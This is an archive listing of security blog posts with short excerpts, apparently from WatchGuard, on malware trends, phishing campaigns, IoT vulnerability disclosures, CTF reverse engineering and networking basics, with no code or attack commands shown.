The Editor — Fri, 28 Feb 2020 14:39:50 -0800

While reviewing currently surging malware attacks back in January 2020, one in particular stood out: JS:Trojan:Cryxos.2550. Its appearances increased over 457% from the previous week. This isn’t a new malware by any means, as Trojan.Cryxos has been written about many times. However, this variant is rather new and since it’s surging, it is important to raise the question if you are protected. In short, if you’re a WatchGuard user then the answer is yes! Allow me to expand on the details of this threat though. About the Malware For starters, the family Trojan.Cryxos has been around for several

My CTF Ventures: picoCTF, Reverse Engineering

The Editor — Mon, 10 Feb 2020 11:06:42 -0800

Moving forward with the picoCTF challenge platform, after completing the General Skills room I opted for the Reverse Engineering room. This room actually stood out first, even before General Skills. I’ve dabbled in reverse engineering (RE) and it’s a fun but complex and challenging process. Fret not, I committed to it and, well, read further to see what I thought about it! Upon entering the Reverse Engineering room, it’s nearly pitch black and you can’t see much. The entrance is semi-illuminated and there’s a sign nearby that reads, “this is not for the faint of heart.” You’re able to walk

HSTS - A Trivial Response to sslstrip

The Editor — Tue, 05 Nov 2019 13:35:02 -0800

Intro HTTP Strict Transport Security (HSTS) is an HTTP security mechanism that allows web sites to declare themselves as accessible only via secure connections and for users to direct user agents (UAs), or your browser, to interact with web sites only over a secure connection. A "secure connection" in this case means an SSL/TLS encrypted HTTP connection, or HTTPS. This mechanism is designed to protect against downgrade attacks such as sslstrip which downgrades HTTPS to HTTP via redirection mappings. I will talk more about that later, but first, how did HSTS come about? Origins HSTS is defined

Android APK Reverse Engineering: Using JADX

The Editor — Fri, 04 Oct 2019 13:26:56 -0700

In continuation of the Android APK Reverse Engineering series, this post will cover how to actually start digging into an APK’s programming logic. My last blog post detailed how to unzip an APK archive and what contents are within. While it’s useful to an extent, it’s not helpful in reading and understanding the programming logic. Remember the code itself is in binary format and cannot be read within a text editor or other development environment. In my testing, I used quite a few different tools and frameworks. There are varying installation processes with each tool, but the most common

MSPs Beware: Attackers Targeting MSP Infrastructure to Install Ransomware

The Editor — Mon, 08 Jul 2019 10:41:16 -0700

In the past two weeks, sophisticated threat actors have targeted managed service providers (MSPs) and Cloud service providers (CSPs), intending to install ransomware within their infrastructure and customer base. Often, these attacks specifically target products and services MSPs use, such as ConnectWise/Kaseya software, the Webroot Management Console, RDP services and more. Though we’ve seen MSP attack campaigns begin much earlier this year, this malicious activity recently progressed with a new batch of attacks that have affected a large number of MSPs, large and small. Whilst these attacks

New Phishing Attacks Stealing MFA Tokens Too

The Editor — Thu, 06 Jun 2019 01:52:33 -0700

In the Firebox Feed, our threat intelligence feed powered by WatchGuard Firebox customers around the world, we recently came across a trending phishing campaign that uses a malicious PDF as part of its attack. Targeting mostly German users, the PDF comes attached to an email with a subject line that translates from German to "Invoice for your sales tax." Included in the email were instructions to add a certificate to the user’s trusted certificate store. While we didn't have to add any certificates for the malware to successfully infect our sandbox, as a rule one should never add a certificate

Green Mountain Grill Security Analysis

The Editor — Fri, 31 May 2019 08:25:20 -0700

Automated smokers like the Green Mountain Grill (GMG) Davy Crockett are great for smoking different meats and other foods without having to tend the grill during the entire process. GMG has pushed this idea further with a WIFI controller that monitors and controls the grill. Now, one doesn’t even need to leave the couch to maintain the grill. Unfortunately though, this convenience comes with a price. The setup of the grill consists of downloading an app to your phone and connecting to the grill on its own broadcasted Wi-Fi network. Using the app, you can add the grill to your home Wi-Fi

Source Code Analysis: Exobot

The Editor — Fri, 12 Apr 2019 14:58:53 -0700

WatchGuard recently released its Internet Security Report (ISR) for Q4 2018. In addition to the many interesting details of malware attacks, IPS hits, and top security incidents, there is also a Threat Research section that covers the Exobot malware campaign. You can listen to The 443 Podcast’s overview of the report if that’s your groove. This post is not a regurgitation of that, rather how the team and I went about analyzing the procured source code. To ensure you’re familiar with what Exobot is, I will repeat the overview of it, but then follow up with how I went about debugging the server

Phishing Passwords With Maersk, Microsoft and Adobe

The Editor — Thu, 14 Mar 2019 13:03:25 -0700

We recently discovered a sharp increase in a particular phishing scam while reviewing threat intelligence from the Firebox feed, our threat data from Firebox appliances around the world. Its primary targets were in Germany and Italy, but we also found some instances of the campaign in the Asian Pacific regions. Addressed with popular shipping companies like DHL and Maersk in both the TO field and the FROM field, this spam mimicked a financial invoice or statement to ultimately try and steal credentials. Let’s take a look at one of the samples we collected that masqueraded as an email from the

How Data Moves Across a Network

The Editor — Fri, 01 Mar 2019 13:48:53 -0800

Building on the Networking Basics article previously written and a high-level overview of How Servers Serve Content, I wanted to write about how data actually moves over a network. That is, what happens when a user on a network node communicates with another networked node. There are two main models that are accepted: the Open Systems Interconnection (OSI) model separates duties into seven distinct layers and the TCP/IP model does so in four distinct layers. Regardless which model you reference, the core concept is the same in that they both separate the duties of transmitting data into

How Servers Serve Content

The Editor — Fri, 15 Feb 2019 14:05:37 -0800

Computers seem to be virtually limitless in their abilities – they can send and receive digital information, serve content via many defined protocols, compute algorithms much faster than a human can, and even provide countless hours of fun and entertainment. One very common use of computers is indeed serving content to consumers, a technological concept known as client / server model. A simple metaphor: a consumer (or a client) goes (makes a connection request) to a place of business (or a server) and peruses the content therein. The bottom line is that a server hosts and provides resources

Networking Basics

The Editor — Thu, 17 Jan 2019 13:50:43 -0800

Computers are a great tool and provide many perks to their users; they can perform tasks in a rather impressively fast manner, potentially offer paperless offices, and you’re even able to play computer games…of course not during working time! Aside from these great benefits, however, how useful would they be if we typed something up, had to print it (thus negating the “paperless” aforementioned attribute) and fax / mail / hand-deliver it to the respective recipient? This is where the ever-loved “network” aspect comes in. There is history to how this concept began, was revised, and came to be

Brexit Email Tricks Users Into Downloading Malware

The Editor — Mon, 03 Dec 2018 16:22:05 -0800

Recently, some individuals received emails that used Brexit to trick them into opening malicious office document attachments. The document’s authors must have been watching the news carefully because the file’s name was Brexit 15.11.2018.docx and the emails came around the same time as the release of the Brexit plan. Looking at the Document, we see the author of the document is “Johnn” according to the metadata. The file’s metadata also mentions Grizli777, a well-known group that pirates Microsoft office software under the mentioned author's name. Fancy Bear, a well-known Russian state

WatchGuard’s Q1 2018 Internet Security Report

The Editor — Wed, 27 Jun 2018 15:38:32 -0700

Today, we’re pleased to announce the release of WatchGuard’s Internet Security Report for Q1 2018! Every quarter, WatchGuard’s Threat Lab looks forward to diving into Firebox Feed data from tens of thousands of live Firebox appliances across the globe to produce a report on the latest security threats cybercriminals are using against small to midsize businesses (SMBs) and distributed enterprises. In addition to analyses of the top computer and network threats from Q1, our latest report highlights useful defensive strategies companies of all sizes can use to protect themselves, an original

WatchGuard’s Q4 2017 Internet Security Report Released; Malicious Office Document Usage on the Rise

The Editor — Tue, 27 Mar 2018 21:05:23 -0700

Today, WatchGuard Technologies released its quarterly Internet Security Report covering Q4 2017. Every quarter we examine anonymized data from our Firebox UTM appliances all across the world and report on the most common malware variants and network attacks that our appliances block. This gives valuable real-world information on the most common network and computer threats aimed at small and medium-sized businesses and distributed enterprises. This quarter, active Fireboxes blocked more than 30 million malware variants and 6.9 million network attacks. We found growth in macro-less Word

WatchGuard’s Q3 2017 Internet Security Report

The Editor — Wed, 13 Dec 2017 05:59:31 -0800

Today, we’re pleased to announce the release of WatchGuard’s Internet Security Report for Q3 2017! Every quarter, WatchGuard’s Threat Lab looks forward to diving into Firebox Feed data from tens of thousands of live Firebox appliances across the globe to produce a report on the latest security threats cybercriminals are using against small to midsize businesses (SMBs) and distributed enterprises. In addition to analyses of the top computer and network threats from Q3, our latest report highlights useful defensive strategies companies of all sizes can use to protect themselves, an original

Indicators of RDP Brute Force Attacks

The Editor — Tue, 05 Dec 2017 14:46:07 -0800

I have been investigating an incident involving two EC2 instances on AWS that were infected with ransomware, cryptocurrency miners, and other types of malware. Sounds scary, right?! Well actually, the approaches that the attackers took to get onto the hosts do not appear to be that sophisticated, and this type of attack could occur in any environment, not just in the cloud. This post presents the suspected way in which the attackers got into the hosts. In later posts, I’ll provide tips to protect yourself from RDP brute force attacks. I’ll also explain what the attackers did on the instances

WatchGuard’s Q2 2017 Internet Security Report

The Editor — Thu, 28 Sep 2017 09:38:23 -0700

Today, we are releasing our Internet Security Report for Q2 2017. Each quarter, we analyze data from our Firebox UTM appliances deployed around the world in order to determine the latest computer and network security threats affecting small to midsize businesses (SMBs) and distributed enterprises. Additionally, in our latest report we analyze the WannaCry Ransomworm and discuss findings from our SSH and Telnet honeypots. Some of this report’s highlights include: Nearly half of all malware is able to circumvent legacy AV solutions Attacks aimed at credential theft are growing Attackers are

WatchGuard's Q1 2017 Internet Security Report

The Editor — Mon, 26 Jun 2017 20:30:28 -0700

Today, I am excited to announce our Internet Security Report for Q1 2017. Each quarter, we examine data from our UTM appliances around the world in order to analyze the latest computer and network security threats affecting small to midsize businesses (SMBs) and distributed enterprises. In our latest report, we evaluate the quarter’s top threats, provide an analysis of the CIA Vault 7 leak, feature new research on IoT cameras and deliver key defensive learnings for readers. Some of the report’s top trends and highlights include: Linux malware is on the rise. Legacy antivirus (AV) continues to

Historical Cryptography Ciphers

The Editor — Thu, 25 May 2017 11:51:14 -0700

Like most technologies, encryption has evolved throughout the years from simple origins. While modern encryption relies on complex computational operations, older encryption ciphers were rudimentary and easy to break. Regardless of each cipher’s strength, all encryption methods share a common goal, to encode a readable “plaintext” message in a way that prevents unauthorized individuals from reading it. Let’s explore the history of encryption and some historical ciphers that were used to hide messages from prying eyes. Substitution Ciphers Caesar Cipher The Caesar cipher, also called a Caesar

Once Stolen, What Do Hackers Do With Your Data?

The Editor — Thu, 18 May 2017 15:15:08 -0700

It’s a common question: What happens to your data after a hacker steals it? Understanding the nuts and bolts of an attacker’s post-hack routine is not only interesting, but it could also help you minimize the damage if your data is stolen. (Note that the following information is a general overview of the most common steps a hacker takes to monetize stolen information. Individual cases may vary and this does not apply to nation-state actors that hack for reasons other than making money.) Once an attack has happened and the criminal has your data, he or she likely runs through the following

Responsible Disclosure: Ouvis C2 HD Security Camera

The Editor — Tue, 09 May 2017 11:03:24 -0700

As a part of our ongoing IoT vulnerability research project, one of the recently tested devices included the Ouvis C2 HD Wireless Security Camera. This is a wireless camera which includes Android, iOS and browser-based remote viewing. Open Telnet Access Vulnerability After connecting an IoT device to my test network, my first task always involves a port scan to identify open services on the device. A port scan of the Ouvis camera showed open Telnet on TCP/23 and an HTTP web server running on TCP/81 – a non-standard port for web servers. I immediately noted the open Telnet access as a potential

WatchGuard's Q4 2016 Internet Security Report

The Editor — Wed, 29 Mar 2017 21:00:07 -0700

Today, I am very excited to share WatchGuard's first formal Internet Security Report. For over a decade, WatchGuard's threat team has educated the general public and our customers about the latest threats, vulnerabilities, and security stories through articles, podcasts, and videos. In this new quarterly security report, we're also excited to share some quantifiable data from WatchGuard's Firebox Feed. The Firebox Feed is the name we’ve given to the anonymized threat data gathered from the tens of thousands of Firebox appliances protecting our customers around the world. It gathers data about

Responsible Disclosure: Amcrest View Web Portal

The Editor — Wed, 18 Jan 2017 07:00:26 -0800

Recently I purchased a number or IoT devices for a vulnerability research project. Among them was the Amcrest IPM-721S Wireless IP camera, a wireless pan-and-tilt camera, which at the time had 6,381 reviews on Amazon.com (interestingly, that number is down to 1,425 at the time of this writing). Camera Setup Initial setup of the camera was straightforward using the Amcrest View Pro Android app. Setup included scanning a serial number QR code on the camera to join the app with the camera’s default peer-to-peer (P2P) wireless network, followed by setting a new administrator password and adding

What is the TCP Split-Handshake Attack and Does It Affect Me?

The Editor — Fri, 15 Apr 2011 12:28:24 -0700

If you've followed security news over the past few days, you've probably seen a lot of hoopla about a TCP split-handshake vulnerability that can affect firewalls and other networking and security devices. Many of the Media's articles characterize this complicated TCP connection attack as, "a hacker exploit that lets an attacker trick a firewall and get into an internal network as a trusted IP connection" or as a "hole" in firewalls. I'm not sure that these descriptions properly characterize this vulnerability, and I suspect many administrators may not really understand how this attack works

Understanding IPv4 Subnetting (Part 2)

Corey Nachreiner — Wed, 13 Apr 2011 10:00:00 -0700

This article continues our attempt to explain the complex subject of subnetting in terms you can understand even if you're not a rocket scientist.

Understanding IPv4 Subnetting (Part 1)

Corey Nachreiner — Mon, 11 Apr 2011 10:00:00 -0700

This Security Fundamentals article explains what IPv4 subnets are, what a subnet mask is, and how you might use them within your own network.

What Is a Port? (and Why Should I Block It?)

Corey Nachreiner — Sat, 09 Apr 2011 10:00:00 -0700

A port is a made-up, or logical, endpoint for a connection, and ports allow the Internet to handle multiple applications over the same wires. Your system figures out how to treat data coming at it partially by looking at what port the data is destined for.

Understanding IP Addresses and Binary

Corey Nachreiner — Thu, 07 Apr 2011 10:00:00 -0700

An IP is a numeric identifier that represents a computer or device on a network. Your computer's IP is like your home's mailing address.

Internet Protocol for Beginners

Corey Nachreiner — Tue, 05 Apr 2011 10:00:00 -0700

Here's how IP routing works, and some suggestions for gaining deeper understanding of IP.